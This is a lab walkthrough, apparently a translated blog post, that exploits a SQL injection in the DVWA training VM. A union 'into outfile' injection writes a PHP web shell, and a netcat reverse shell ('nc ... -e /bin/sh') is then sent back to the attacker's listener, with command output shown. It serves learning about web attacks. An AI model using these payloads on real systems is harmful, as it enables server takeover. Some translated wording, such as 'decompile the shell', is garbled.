One of the ultimate goals of hacking is to hijack and up the shell to run system commands and hit a target or network. SQL injection are usually just associated with databases and their data, but it can actually be used as a vector to capture shells. In this article, we will exploit a simple SQL injection vulnerability to execute commands and eventually decompile the shell on the server.
| Join the channel Telegram of the AnonyViet 👉 Link 👈 |
I will use DVWA, a vulnerable virtual machine, and Kali Linux to perform the attack. If you are new to Kali, you should read this post for how to set up and secure Kali, to make sure your system is ready for anything.
SQL Injection Overview
SQL injection is one of the most common vulnerabilities encountered on the web and can also be one of the most dangerous. Attackers can inject malicious SQL code to extract sensitive information, modify or destroy existing data, or escalate an attack to take over the server.
There are different types of SQL injection and different attack methods for different database systems in use. Although this type of attack is one of the easiest to start learning, it can still take you several years to master SQL injection.
Step 1: Target exploration
The first thing we need to do is log in to DVWA using the default credentials, admin is the username and the password is password.
Next, go to the “Security” tab on the left and set the security level to “low”. This will ensure our attack goes smoothly.
Navigate to the “SQL Injection” page to initiate the attack. We can see that the function of the page is to get the user ID and return information, in this case the first and last name.
I want to verify that this input is indeed vulnerable to SQL injection. The first thing to try is to simply enter a single double quote, which will close the statement if the system is really vulnerable. And when I do so, the system returns an error, even telling us specifically that the website is using MySQL as the database. At this point, we’ve most likely found a vulnerable entry point.
The next thing we need to do is enumerate the database and determine the number of columns in use. This will allow us to reliably exploit the union-based vulnerability in just a little bit. For a better understanding, let’s see what the query command would look like during normal input submission:
select first_name, surname from users where user_id='';This could be a query on the backend, with first_name and surname are selected columns, for a total of two columns. But we need to know for sure for this vulnerability to work. We can use order by.
This clause will sort the results of the query by columns. Since we are pretty sure that at least two columns are in use, if we will sort by 1 or 2, the query will succeed. But what if we want to order by 3? If we are correct, then this query will throw an error.
Send the following injection as input, and it will result in an error. The pound sign is used here to comment out the rest of the query so it doesn’t cause any additional syntax errors.
' order by 3 #You can see that we actually got an error, so now we know for sure that only two columns are being used.
Step 2: Access the shell and exploit the command
Now that we have a bit more information about the database, we can use this to our advantage to perform SQL injection based on union. The union operator is used in SQL to combine the results of two or more select statements, but for it to work properly, the statements must have the same number of columns. This is why we need to learn the backend sooner.
There’s a lot we can do with injections based on union, but in this article, we need to take care of taking advantage of this vulnerability to run operating system commands. One of the easiest ways to do this is to upload a simple PHP shell to pass our commands through.
We need to specify the root directory of the web server to load the shell. Depending on the application and the type of web server in use, the root directory may differ, especially if the administrator changes the default location or has sufficient permissions. For the purposes of this attack, I will assume that the default Apache web root (/var/www/) is being used with public write permissions. Information about the web server, including the root directory, can usually be found in the “phpinfo.php” file.
We can use the into outfile command to write to a file. In this case, we will insert a simple PHP script that can run system commands. The script that I named “cmd.php”, will look like this:
<?php system($_GET["cmd"]); ?>Now, we will do the injection. We will need to use double quotes in the script because we need to enclose the second part of the statement in single quotes – this will avoid syntax errors. The complete injection command should look like this:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #If this command works properly, we will be able to access our shell through the URL and by providing the system command as a parameter. For example, whoami will give us the current user information.
Or uname -a, will give us information about the system.
But providing all these commands via the URL parameter is boring. We can take advantage of this to reverse the shell and go one step further.
Step 3: Decompile Shell with Netcat
Netcat is a powerful network utility used to troubleshoot connection problems, but it can actually be used by hackers as a backdoor and as a method to hijack shells. A lot of Linux distributions have this utility installed by default, so if we can access this tool it’s game over.
First, we’ll need to set up a listener on our local machine. Use the nc command along with -lvp to specify it to listen and to set the corresponding port number.
nc -lvp 1234
listening on [any] 1234 ...Next, as a parameter to the PHP shell in the URL, enter the following command. It asks the server to execute a shell (-e/bin/sh) and sends it back to our local machine. You need to make sure to use the proper IP address and port.
nc 172.16.1.100 1234 -e /bin/shWait a few seconds and we should see our listener catch the shell and open a connection. From here, we can run commands like id, uname -a and ps.
connect to [172.16.1.100] from (UNKNOWN) [172.16.1.102] 47643
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ps
PID TTY TIME CMD
4665 ? 00:00:00 apache2
4669 ? 00:00:00 apache2
4671 ? 00:00:00 apache2
4673 ? 00:00:00 apache2
4674 ? 00:00:00 apache2
4803 ? 00:00:00 apache2
4810 ? 00:00:00 apache2
4914 ? 00:00:00 php
4915 ? 00:00:00 sh
4919 ? 00:00:00 psWe now have the means to execute commands on the web server from our own terminal, all stemming from a simple SQL injection vulnerability. I hope this practical article will help you acquire more knowledge.
